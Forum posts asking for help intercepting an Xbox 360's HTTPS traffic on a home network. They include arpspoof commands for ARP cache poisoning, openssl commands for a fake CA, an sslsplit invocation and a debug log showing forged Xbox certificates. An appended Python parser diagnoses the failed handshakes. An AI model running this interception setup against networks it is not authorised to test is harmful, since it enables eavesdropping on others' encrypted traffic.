Posts posted by precursor

  1. I forgot to post the debug output from sslsplit:

    Generated RSA key for leaf certs.
    SSLsplit 0.4.9 (built 2015-03-10)
    Copyright (c) 2009-2014, Daniel Roethlisberger <daniel@roe.ch>
    http://www.roe.ch/SSLsplit
    Build info: V:FILE
    Features: -DHAVE_NETFILTER
    NAT engines: netfilter* tproxy
    netfilter:  IP_TRANSPARENT SOL_IPV6 !IPV6_ORIGINAL_DST
    compiled against OpenSSL 1.0.2 22 Jan 2015 (1000200f)
    rtlinked against OpenSSL 1.0.2 22 Jan 2015 (1000200f)
    TLS Server Name Indication (SNI) supported
    OpenSSL is thread-safe with THREADID
    Using SSL_MODE_RELEASE_BUFFERS
    SSL/TLS algorithm availability: RSA DSA ECDSA DH ECDH EC
    OpenSSL option availability: SSL_OP_NO_COMPRESSION SSL_OP_NO_TICKET SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION SSL_OP_TLS_ROLLBACK_BUG
    compiled against libevent 2.0.22-stable
    rtlinked against libevent 2.0.22-stable
    2 CPU cores detected
    proxyspecs:
    - [0.0.0.0]:8080 tcp plain netfilter
    - [0.0.0.0]:8443 ssl plain netfilter
    Loaded CA: '/C=US/ST=UT/O=Internet Widgits Pty Ltd/CN=Someone'
    Using libevent backend 'epoll'
    Event base supports: edge yes, O(1) yes, anyfd no
    Inserted events:
      0x12054b0 [fd 7] Read Persist
      0x1208740 [fd 8] Read Persist
      0x12088f0 [fd 9] Read Persist
      0x12052e8 [fd 6] Read Persist
      0x1208980 [fd 3] Signal Persist
      0x1208bc0 [fd 1] Signal Persist
      0x1208cf0 [fd 2] Signal Persist
      0x1208e20 [fd 13] Signal Persist
    Initialized 4 connection handling threads
    Started 4 connection handling threads
    Starting main event loop.
    Connecting to [199.117.103.168]:80
    tcp [192.168.0.22]:19970 [199.117.103.168]:80
    SNI peek: [n/a] [complete]
    Connecting to [134.170.178.197]:443
    ===> Original server certificate:
    Subject DN: /CN=*.xboxlive.com
    Common Names: *.xboxlive.com
    Fingerprint: 69:c6:f2:83:ee:0a:16:3b:fd:a6:df:f7:21:c9:97:0a:6d:7d:65:91
    Certificate cache: MISS
    ===> Forged server certificate:
    Subject DN: /CN=*.xboxlive.com
    Common Names: *.xboxlive.com
    Fingerprint: 16:64:58:97:e4:90:80:7d:84:77:67:bd:f2:93:c6:f2:ea:d6:68:d4
    ssl [192.168.0.22]:5808 [134.170.178.197]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
    Unclean SSL shutdown.
    SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
    Garbage collecting caches started.
    Garbage collecting caches done.
    SNI peek: [n/a] [complete]
    Connecting to [134.170.178.64]:443
    ===> Original server certificate:
    Subject DN: /CN=*.xboxlive.com
    Common Names: *.xboxlive.com
    Fingerprint: 69:c6:f2:83:ee:0a:16:3b:fd:a6:df:f7:21:c9:97:0a:6d:7d:65:91
    Certificate cache: HIT
    ===> Forged server certificate:
    Subject DN: /CN=*.xboxlive.com
    Common Names: *.xboxlive.com
    Fingerprint: 16:64:58:97:e4:90:80:7d:84:77:67:bd:f2:93:c6:f2:ea:d6:68:d4
    ssl [192.168.0.22]:48310 [134.170.178.64]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
    Unclean SSL shutdown.
    SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
    SNI peek: [n/a] [complete]
    Connecting to [65.55.42.33]:443
    SNI peek: [n/a] [complete]
    Connecting to [65.55.42.33]:443
    SNI peek: [n/a] [complete]
    Connecting to [157.56.70.154]:443
    ===> Original server certificate:
    Subject DN: /CN=*.xboxlive.com
    Common Names: *.xboxlive.com
    Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb
    Certificate cache: MISS
    ===> Forged server certificate:
    Subject DN: /CN=*.xboxlive.com
    Common Names: *.xboxlive.com
    Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c
    ssl [192.168.0.22]:32910 [65.55.42.33]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
    Unclean SSL shutdown.
    SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
    SNI peek: [n/a] [complete]
    Attempt reuse dst SSL session
    Connecting to [134.170.178.197]:443
    ===> Original server certificate:
    Subject DN: /CN=*.xboxlive.com
    Common Names: *.xboxlive.com
    Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb
    Certificate cache: HIT
    ===> Forged server certificate:
    Subject DN: /CN=*.xboxlive.com
    Common Names: *.xboxlive.com
    Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c
    ssl [192.168.0.22]:29356 [65.55.42.33]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
    ===> Original server certificate:
    Subject DN: /CN=*.xboxlive.com
    Common Names: *.xboxlive.com
    Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb
    Certificate cache: HIT
    ===> Forged server certificate:
    Subject DN: /CN=*.xboxlive.com
    Common Names: *.xboxlive.com
    Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c
    ssl [192.168.0.22]:28325 [157.56.70.154]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
    ===> Original server certificate:
    Subject DN: /CN=*.xboxlive.com
    Common Names: *.xboxlive.com
    Fingerprint: 69:c6:f2:83:ee:0a:16:3b:fd:a6:df:f7:21:c9:97:0a:6d:7d:65:91
    Certificate cache: HIT
    ===> Forged server certificate:
    Subject DN: /CN=*.xboxlive.com
    Common Names: *.xboxlive.com
    Fingerprint: 16:64:58:97:e4:90:80:7d:84:77:67:bd:f2:93:c6:f2:ea:d6:68:d4
    ssl [192.168.0.22]:25598 [134.170.178.197]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
    Unclean SSL shutdown.
    SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
    Unclean SSL shutdown.
    SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
    Unclean SSL shutdown.
    SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
    SNI peek: [n/a] [complete]
    Connecting to [172.230.192.227]:443
    SNI peek: [n/a] [complete]
    Attempt reuse dst SSL session
    Connecting to [65.55.42.33]:443
    ===> Original server certificate:
    Subject DN: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/OU=Xbox/CN=*.xbox.com
    Common Names: *.xbox.com/*.xbox.com
    Fingerprint: fa:36:ff:8e:70:87:3d:52:3b:65:23:43:65:63:36:5e:4f:24:a6:eb
    Certificate cache: MISS
    ===> Forged server certificate:
    Subject DN: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/OU=Xbox/CN=*.xbox.com
    Common Names: *.xbox.com/*.xbox.com
    Fingerprint: 44:4c:08:75:ea:66:05:74:ff:37:de:d0:15:2e:bb:c2:26:e3:12:76
    ssl [192.168.0.22]:10291 [172.230.192.227]:443 sni:- crt:*.xbox.com/*.xbox.com origcrt:*.xbox.com/*.xbox.com
    ===> Original server certificate:
    Subject DN: /CN=*.xboxlive.com
    Common Names: *.xboxlive.com
    Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb
    Certificate cache: HIT
    ===> Forged server certificate:
    Subject DN: /CN=*.xboxlive.com
    Common Names: *.xboxlive.com
    Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c
    ssl [192.168.0.22]:57485 [65.55.42.33]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
    Unclean SSL shutdown.
    SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
    Unclean SSL shutdown.
    SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
    SSL_free() in state 00000003 = 0003 = SSLOK  (SSL negotiation finished successfully) [connect socket]
    Garbage collecting caches started.
    Garbage collecting caches done.
    ^CReceived signal 2
    Main event loop stopped.
  2. I'm attempting to sniff my Xbox 360's traffic and see the cleartext data sent over HTTPS+SSL.

    My Xbox 360's local IP address is 192.168.0.22.

    My attacker Arch Linux box's address is: 192.168.0.18.

    I have installed dsniff and SSLsplit on the attacker box and am performing an ARP cache poisoning attack using the following commands simultaneously in two terminal windows:

    arpspoof -i enp0s25 -t 192.168.0.1 192.168.0.22

    arpspoof -i enp0s25 -t 192.168.0.22 192.168.0.1

    I created a fake certificate using the following commands:

    openssl genrsa -out ca.key 4096
    openssl req -new -x509 -days 1826 -key ca.key -out ca.crt

    I am running sslsplit like this:

    sslsplit -D -l connections.log -j /var/log/sslsplit/ -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

    When I log in to XBL on the 360, I see non-SSL traffic over port 80 in the logs, but the SSL traffic over port 443 has log files with nothing in them (size=0KB).

    My guess is that there is a problem with my certificate; it is not able to verify that it has been signed by a Root CA. Do you know of a way to fix this issue?

    If that's not the issue, what is, and how can I fix it?

    Thanks for your help.
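An added example (not the poster's code and not part of sslsplit): a small Python parser for the SSL_free() lines of an sslsplit -D log like the one in the first post, which classifies how each TLS leg ended. It assumes the sslsplit 0.4.9 line format shown above and runs on a constructed excerpt that uses documentation-range addresses.

```python
import re
from collections import Counter

# Constructed excerpt shaped like the sslsplit 0.4.9 -D output quoted in the first
# post (documentation-range addresses and a placeholder host; not the original log).
SAMPLE_LOG = """\
===> Forged server certificate:
ssl [192.0.2.22]:5808 [203.0.113.10]:443 sni:- crt:*.example.test origcrt:*.example.test
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
SSL_free() in state 00000003 = 0003 = SSLOK  (SSL negotiation finished successfully) [connect socket]
"""

# One SSL_free() line: hex state, OpenSSL's state description, and which socket it was on.
SSL_FREE_RE = re.compile(
    r"SSL_free\(\) in state (?P<state>[0-9a-f]+) = .*\((?P<desc>[^)]*)\) "
    r"\[(?P<side>accept|connect) socket\]")

def classify_ssl_free(line):
    """Map one SSL_free() line to a category, or None for any other line.
    accept socket = client<->sslsplit leg (the forged cert is presented here);
    connect socket = sslsplit<->real server leg; SSLOK = that leg's handshake
    completed, any other state = the leg was torn down mid-handshake."""
    m = SSL_FREE_RE.search(line)
    if not m:
        return None
    side = "client_leg" if m["side"] == "accept" else "server_leg"
    if m["desc"].startswith("SSL negotiation finished successfully"):
        return side + "_ok"
    return "%s_aborted_at[%s]" % (side, m["desc"].strip())  # record where it died

def summarize(log_text):
    """Count how each TLS leg ended over the whole log. sslsplit's worker threads
    interleave their output, so this is a per-event count, not per connection."""
    counts = Counter()
    for line in log_text.splitlines():
        cat = classify_ssl_free(line)
        if cat:
            counts[cat] += 1
    return counts

def client_rejected_forged_cert(counts):
    """True when no client leg ever completed while server legs did: the pattern
    a client that validates the chain (or pins the certificate) produces."""
    aborted = sum(n for k, n in counts.items() if k.startswith("client_leg_aborted"))
    return counts["client_leg_ok"] == 0 and aborted > 0 and counts["server_leg_ok"] > 0
```

In the posted log every accept-socket SSL_free() sits in the "read client key exchange" state while the only connect-socket one is SSLOK: the handshake to the real server completed but the client hung up right after receiving the forged certificate, which is what a client that validates the chain or pins the certificate looks like from the proxy side, and it matches the empty port 443 log files.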